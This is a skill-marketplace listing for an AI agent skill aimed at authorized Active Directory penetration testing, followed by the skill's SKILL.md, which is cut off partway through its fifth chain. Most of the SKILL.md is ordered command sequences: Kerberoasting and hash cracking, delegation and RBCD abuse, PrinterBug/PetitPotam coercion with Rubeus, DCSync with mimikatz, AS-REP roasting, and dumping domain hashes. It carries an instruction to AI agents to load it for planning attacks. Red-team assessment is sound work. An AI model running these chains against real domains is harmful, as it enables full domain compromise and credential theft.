Active Directory Kerberos Attacks
Plan authorized multi-step Kerberos attack chains from domain foothold to escalation when assessing Active Directory environments.
Overview
active-directory-kerberos-attacks is an agent skill for the Ship phase that documents multi-step Kerberos attack chains for authorized Active Directory penetration testing.
Install
npx skills add https://github.com/yaklang/hack-skills --skill active-directory-kerberos-attacksWhat is this skill?
- Documented chain: Kerberoast → constrained delegation → domain admin via S4U2Self/S4U2Proxy
- RBCD plus Kerberos lateral movement from writable computer objects
- Step-by-step tooling references (GetUserSPNs, findDelegation, getST, secretsdump, addcomputer)
- Assumes base Kerberos SKILL.md loaded for individual techniques
- Explicit multi-step path planning from low-privilege user to DA
- Two documented multi-step chains: Kerberoast→delegation→DA and RBCD→lateral movement
- Four-step Kerberoast chain culminating in secretsdump on DC01
Adoption & trust: 1.1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).
What problem does it solve?
You have a domain foothold and individual Kerberos tricks documented, but no ordered chain from low privilege to domain-wide compromise for the engagement.
Who is it for?
Authorized pentesters, security engineers, or MSPs assessing AD with Impacket-style tooling in lab or scoped production tests.
Skip if: Solo indie web-only builders, unauthorized domain access, or teams without an AD lab and explicit customer permission.
When should I use this skill?
Planning multi-step Kerberos attack paths from initial foothold to domain admin after the main Kerberos SKILL.md is loaded.
What do I get? / Deliverables
You get reproducible multi-step chains with tooling steps for Kerberoast-delegation-DA and RBCD lateral paths, ready to validate detections or close findings.
- Ordered attack chain with commands per step
- Escalation narrative from low-privilege user to domain-level access
Recommended Skills
Journey fit
End-to-end AD attack chains are documented for structured security assessments during enterprise ship or compliance exercises, not for everyday indie product coding. Security subphase under ship fits red-team style validation of identity infrastructure before or after major releases.
How it compares
Chain orchestration layer on top of per-attack Kerberos docs—not a replacement for BloodHound hygiene or generic Windows hardening guides.
Common Questions / FAQ
Who is active-directory-kerberos-attacks for?
Security professionals planning authorized AD engagements who need end-to-end Kerberos escalation paths beyond single-technique cheat sheets.
When should I use active-directory-kerberos-attacks?
During ship-phase security assessments of on-prem or hybrid identity, purple-team exercises, or when scoping lateral movement after a low-privilege domain compromise in a lab.
Is active-directory-kerberos-attacks safe to install?
Review the Security Audits panel on this Prism page; content is offensive-security oriented and must only run under contract and legal authorization.
SKILL.md
READMESKILL.md - Active Directory Kerberos Attacks
# Kerberos Multi-Step Attack Chains > **AI LOAD INSTRUCTION**: Load this for end-to-end Kerberos attack chains that combine multiple AD techniques. Assumes the main [SKILL.md](./SKILL.md) is already loaded for individual Kerberos attacks. Use when planning multi-step attack paths from initial foothold to domain admin. --- ## 1. CHAIN: KERBEROAST → CONSTRAINED DELEGATION → DOMAIN ADMIN ### Scenario Low-privilege domain user → cracked service account → delegation abuse → DA. ``` Step 1: Kerberoast │ GetUserSPNs.py DOMAIN/lowpriv:password -dc-ip DC -request │ hashcat -m 13100 tgs.txt wordlist.txt │ → Cracked: svc_backup / P@ssw0rd2024 │ Step 2: Enumerate delegation │ findDelegation.py DOMAIN/svc_backup:P@ssw0rd2024 -dc-ip DC │ → svc_backup has constrained delegation to cifs/DC01.domain.com │ Step 3: S4U2Self + S4U2Proxy │ getST.py -spn cifs/DC01.domain.com -impersonate administrator DOMAIN/svc_backup:P@ssw0rd2024 │ Step 4: Access DC as administrator │ export KRB5CCNAME=administrator.ccache │ secretsdump.py -k -no-pass DC01.domain.com │ → Domain hashes dumped ``` --- ## 2. CHAIN: RBCD + KERBEROS → LATERAL MOVEMENT ### Scenario Write access to a computer's `msDS-AllowedToActOnBehalfOfOtherIdentity` → RBCD → lateral to that host. ``` Step 1: Identify writable computer object │ (via BloodHound: GenericWrite on TARGET$) │ Step 2: Create machine account │ addcomputer.py -computer-name 'EVIL$' -computer-pass 'Passw0rd!' DOMAIN/user:pass -dc-ip DC │ Step 3: Set RBCD │ rbcd.py -delegate-from 'EVIL$' -delegate-to 'TARGET$' -action write DOMAIN/user:pass -dc-ip DC │ Step 4: S4U chain │ getST.py -spn cifs/TARGET.domain.com -impersonate administrator DOMAIN/'EVIL$':'Passw0rd!' -dc-ip DC │ Step 5: Use ticket │ export KRB5CCNAME=administrator.ccache │ psexec.py -k -no-pass TARGET.domain.com ``` --- ## 3. CHAIN: UNCONSTRAINED DELEGATION + PRINTERBUG → DCSYNC ### Scenario Compromised host with unconstrained delegation → coerce DC → capture DC TGT → DCSync. ``` Step 1: Confirm unconstrained delegation │ Get-DomainComputer -Unconstrained (via PowerView) │ → WEBSRV01.domain.com has unconstrained delegation │ Step 2: Start Rubeus monitor on WEBSRV01 │ Rubeus.exe monitor /interval:5 /nowrap /targetuser:DC01$ │ Step 3: Coerce DC authentication │ # From any domain machine, trigger PrinterBug: │ SpoolSample.exe DC01.domain.com WEBSRV01.domain.com │ # Or PetitPotam: │ PetitPotam.py WEBSRV01.domain.com DC01.domain.com │ Step 4: Capture DC01$ TGT from Rubeus output │ Rubeus.exe ptt /ticket:base64_DC01_TGT │ Step 5: DCSync with DC machine ticket │ mimikatz # lsadump::dcsync /domain:domain.com /user:krbtgt │ → krbtgt hash obtained → golden ticket capability ``` --- ## 4. CHAIN: AS-REP ROAST → ACL ABUSE → DCSYNC ### Scenario No creds initially → AS-REP roast → cracked user has DCSync rights via ACL path. ``` Step 1: Enumerate users without preauth (no creds needed) │ GetNPUsers.py DOMAIN/ -usersfile users.txt -dc-ip DC -format hashcat │ → $krb5asrep$23$svc_monitor@DOMAIN:... │ Step 2: Crack AS-REP hash │ hashcat -m 18200 asrep.txt wordlist.txt │ → svc_monitor / Welcome2024! │ Step 3: BloodHound enumeration │ bloodhound-python -d domain.com -u svc_monitor -p Welcome2024! -c all -dc DC01 │ → svc_monitor has GenericAll on IT-ADMINS group │ → IT-ADMINS group has DCSync rights │ Step 4: Add self to IT-ADMINS │ net rpc group addmem "IT-ADMINS" svc_monitor -U DOMAIN/svc_monitor -S DC01 │ Step 5: DCSync │ secretsdump.py DOMAIN/svc_monitor:Welcome2024!@DC01 │ → All domain hashes ``` --- ## 5. CHAIN: TARGETED KERBEROAST VIA ACL ### Scenario GenericWrite on a user → set SPN → kerberoast → crack password. ``` Step 1: Identify GenericWrite permission │ BloodHound: user "lowpriv" has GenericWrite on "svc_admin" │ Step 2: Set SPN on target user (targeted kerberoasting) │ # PowerView │ Set-DomainObject -Identity svc_admin -Set @{serviceprincipalname='fake/service'} │ # Or Impacket │ addspn.py -u DOMAIN/lowpriv -p pa